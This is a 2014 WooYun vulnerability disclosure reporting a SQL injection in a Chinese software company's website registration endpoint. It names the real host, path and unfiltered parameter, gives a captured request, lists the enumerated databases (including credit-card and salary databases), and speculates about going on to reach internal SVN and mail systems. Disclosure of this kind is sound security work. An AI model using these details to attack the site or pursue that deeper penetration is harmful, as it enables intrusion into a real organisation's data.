当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051228

漏洞标题:中软融鑫主站SQL注入漏洞(跨库,可继续渗透)

相关厂商:中软融鑫

漏洞作者: cuger

提交时间:2014-02-18 15:26

修复时间:2014-04-04 15:27

公开时间:2014-04-04 15:27

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-04-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

新版主站SQL注入漏洞,DBA权限,如果深入渗透的话,应该可以搞定中软融鑫。因为SVN、MAIL什么的全在上面,虽说需要VPN拨入,若有充足的时间,拿下只是时间问题。

详细说明:

存在问题的页面为注册页面,其他未测试。

1.jpg


3.jpg


随便填写信息后抓包,userID参数未过滤:

GET /tools/WebsiteManage.aspx?Ran=0.6570263219457863&_=1392300615189&act=AddUser&userID=test&password=123456&email=test@qq.com&name=test&telephone=13800138000&companyname=test HTTP/1.1
Host: www.resoft.css.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/plain, */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://www.resoft.css.com.cn/resoft/iframe/zhuce/zhuce.html
Cookie: ASP.NET_SessionId=zagksjn5tafoo3451kjr4f45
Connection: keep-alive

漏洞证明:

2.jpg


available databases [15]:
[*] CreditCardDB
[*] market
[*] master
[*] model
[*] msdb
[*] QuestSoftware
[*] ResoftBackDB
[*] ResoftInterfaceDB
[*] ResoftMailDB
[*] ResoftUtilDB
[*] Salary
[*] SvnInterfaceDB
[*] tempdb
[*] WebsiteManage
[*] worklog

修复方案:

过滤吧。

版权声明:转载请注明来源 cuger@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2014-02-23 22:03 | 菜鸟甲 ( 路人 | Rank:28 漏洞数:14 | 啥也不会的菜鸟)

    v5

  2. 2014-02-23 22:33 | cuger ( 普通白帽子 | Rank:200 漏洞数:44 | 这个家伙很懒,什么也没留下)

    @菜鸟甲 V5个毛线,得罪了好多人。。。。唉